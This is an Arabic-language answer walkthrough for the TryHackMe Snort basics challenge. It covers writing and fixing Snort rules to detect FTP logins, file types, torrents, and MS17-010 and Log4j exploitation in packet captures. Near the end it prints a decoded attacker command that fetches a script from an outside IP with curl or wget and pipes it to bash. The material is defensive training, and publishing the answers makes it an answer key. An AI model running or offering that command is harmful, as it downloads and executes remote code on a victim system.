لقد قمنا بتغطية استخدام Snort لتحليل حركة مرور FTP وHTTP من خلال إنشاء القواعد المناسبة وتكوينها. لتطبيق ما تعلمناه، قمنا بتحليل لقطات معينة للشبكة باستخدام Snort لاختبار القواعد التي تم إنشاؤها واكتشاف أنماط حركة المرور. كان هذا جزءًا من تحدي TryHackMe Snort – الأساسيات.
دورة Splunk SIEM الكاملة مع سيناريوهات عملية
يسلط الضوء
SNORT هو نظام مفتوح المصدر لكشف التسلل إلى الشبكة ومنعه (NIDS/NIPS). تم تطويره وما زال يحتفظ به مارتن روش، والمساهمون في المصادر المفتوحة، وفريق Cisco Talos. قدرات الشخير
- تحليل حركة المرور الحية
- كشف الهجوم والتحقيق
- تسجيل الحزمة
- تحليل البروتوكول
- تنبيه في الوقت الحقيقي
- الوحدات والإضافات
- المعالجات المسبقة
- دعم عبر الأنظمة الأساسية! (لينوكس وويندوز)
أوضاع تشغيل Snort IDS
وضع الشم
– قراءة حزم IP ومطالبتها في تطبيق وحدة التحكم.وضع مسجل الحزم
– تسجيل جميع حزم IP (الواردة والصادرة) التي تزور الشبكة.أوضاع NIDS وNIPS
: قم بتسجيل/إسقاط الحزم التي تعتبر ضارة وفقًا للقواعد المحددة من قبل المستخدم
إجابات الغرفة | تحدي الشخير - الأساسيات
ما هو عدد الحزم المكتشفة؟
ملحوظة: يجب عليك الإجابة على هذا السؤال بشكل صحيح قبل الإجابة على بقية الأسئلة في هذه المهمة.
328
التحقيق في ملف السجل.
ما هو عنوان الوجهة للحزمة 63؟
145.254.160.237
التحقيق في ملف السجل.
ما هو رقم ACK للحزمة 64؟
0x38AFFF3
التحقيق في ملف السجل.
ما هو الرقم التسلسلي للحزمة 62؟
0x38AFFF3
دبليو
التحقيق في ملف السجل.
ما هو TTL للحزمة 65؟
128
التحقيق في ملف السجل.
ما هو عنوان IP المصدر للحزمة 65؟
145.254.160.237
التحقيق في ملف السجل.
ما هو المنفذ المصدر للحزمة 65؟
3372
استخدم ملف pcap المحدد.
اكتب قواعد للكشف عن "جميع منافذ TCP 21"حركة المرور في pcap المحدد.
ما هو عدد الحزم المكتشفة؟
614
التحقيق في ملف السجل.
ما هو اسم خدمة FTP؟
خدمة بروتوكول نقل الملفات من ميكروسوفت
امسح ملفات السجل والإنذار السابقة.
إلغاء التنشيط/التعليق على القواعد القديمة.
اكتب قاعدة لاكتشاف محاولات تسجيل الدخول الفاشلة عبر بروتوكول نقل الملفات (FTP) في ملف pcap المحدد.
ما هو عدد الحزم المكتشفة؟
41
امسح ملفات السجل والإنذار السابقة.
إلغاء التنشيط/التعليق على القاعدة القديمة.
اكتب قاعدة لاكتشاف عمليات تسجيل الدخول الناجحة لـ FTP في ملف pcap المحدد.
ما هو عدد الحزم المكتشفة؟
1
امسح ملفات السجل والإنذار السابقة.
إلغاء التنشيط/التعليق على القاعدة القديمة.
اكتب قاعدة للكشف عن الفشل بروتوكول نقل الملفات محاولات تسجيل الدخول باستخدام اسم مستخدم صالح ولكن كلمة مرور سيئة أو بدون كلمة مرور.
ما هو عدد الحزم المكتشفة؟
42
امسح ملفات السجل والإنذار السابقة.
إلغاء التنشيط/التعليق على القاعدة القديمة.
اكتب قاعدة للكشف عن الفشل بروتوكول نقل الملفات محاولات تسجيل الدخول باستخدام اسم المستخدم "المسؤول" ولكن كلمة المرور سيئة أو لا توجد كلمة مرور.
ما هو عدد الحزم المكتشفة؟
7
انتقل إلى مجلد المهام.
استخدم ملف pcap المحدد.
اكتب قاعدة لاكتشاف ملف PNG في ملف pcap المحدد.
تحقق من السجلات وحدد اسم البرنامج المضمن في الحزمة.
أدوبي إيماج ريديك
امسح ملفات السجل والإنذار السابقة.
إلغاء التنشيط/التعليق على القاعدة القديمة.
اكتب قاعدة لاكتشاف ملف GIF في ملف pcap المحدد.
تحقق من السجلات وحدد تنسيق الصورة المضمن في الحزمة.
GIF89a
انتقل إلى مجلد المهام.
استخدم ملف pcap المحدد.
اكتب قاعدة لاكتشاف ملف تعريف التورنت في ملف pcap المحدد.
ما هو عدد الحزم المكتشفة؟
2
التحقق من ملفات السجل/التنبيه.
ما اسم تطبيق التورنت؟
تورنت
التحقق من ملفات السجل/التنبيه.
ما هو نوع MIME (امتدادات بريد الإنترنت متعددة الأغراض) لملف تعريف التورنت؟
التطبيق/x-bittorrent
التحقق من ملفات السجل/التنبيه.
ما هو اسم المضيف لملف تعريف التورنت؟
Tracker2.torrentbox.com
في هذا القسم، تحتاج إلى إصلاح أخطاء بناء الجملة في ملفات القواعد المحددة.
يمكنك اختبار كل مجموعة قواعد باستخدام بنية الأوامر التالية؛
sudo snort -c local-X.rules -r mx-1.pcap -A console
أصلح الخطأ النحوي في ملف local-1.rules واجعله يعمل بسلاسة.
ما هو عدد الحزم المكتشفة؟
16
أصلح الخطأ النحوي في ملف local-2.rules واجعله يعمل بسلاسة.
ما هو عدد الحزم المكتشفة؟
68
أصلح الخطأ النحوي في ملف local-3.rules واجعله يعمل بسلاسة.
ما هو عدد الحزم المكتشفة؟
87
أصلح الخطأ النحوي في ملف local-4.rules واجعله يعمل بسلاسة.
ما هو عدد الحزم المكتشفة؟
90
أصلح الخطأ النحوي في ملف local-5.rules واجعله يعمل بسلاسة.
ما هو عدد الحزم المكتشفة؟
155
إصلاح الخطأ المنطقي في ملف local-6.rules وجعله يعمل بسلاسة لإنشاء التنبيهات.
ما هو عدد الحزم المكتشفة؟
2
إصلاح الخطأ المنطقي في ملف local-7.rules وجعله يعمل بسلاسة لإنشاء التنبيهات.
ما اسم الخيار المطلوب :
رسالة
انتقل إلى مجلد المهام.
استخدم ملف pcap المحدد.
استخدم ملف القاعدة المحدد (local.rules) للتحقيق في استغلال ms1710.
ما هو عدد الحزم المكتشفة؟
25154
امسح ملفات السجل والإنذار السابقة.
استخدم ملف local-1.rules الفارغ لكتابة قاعدة جديدة لاكتشاف الحمولات التي تحتوي على الكلمة الأساسية "\IPC$".
ما هو عدد الحزم المكتشفة؟
12
التحقق من ملفات السجل/التنبيه.
ماذا هو المسار المطلوب؟
\192.168.116.138\IPC$
ما هي نتيجة CVSS v2 لثغرة MS17-010؟
9.3
استخدم ملف pcap المحدد.
استخدم ملف القاعدة المحدد (local.rules) للتحقيق في استغلال log4j.
ما هو عدد الحزم المكتشفة؟
26
التحقق من ملفات السجل/التنبيه.
كم عدد القواعد التي تم تفعيلها؟.
4
التحقق من ملفات السجل/التنبيه.
ما هي الأرقام الستة الأولى من القاعدة التي تم تشغيلها؟
210037
امسح ملفات السجل والإنذار السابقة.
استخدم ملف local-1.rules الفارغ لكتابة قاعدة جديدة للكشف عن حمولات الحزم بين 770 و 855 بايت.
ما هو عدد الحزم المكتشفة؟
41
التحقق من ملفات السجل/التنبيه.
ماذا ما هو اسم خوارزمية التشفير المستخدمة؟
base64
التحقق من ملفات السجل/التنبيه.
ماذا هو معرف IP للحزمة المقابلة؟
62808
التحقق من ملفات السجل/التنبيه.
فك تشفير الأمر المشفر.
ما هو أمر المهاجم؟
(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|باش
ما هي نتيجة CVSS v2 لثغرة Log4j؟
9.3
شرح بالفيديو | تحدي TryHackMe Snort – الأساسيات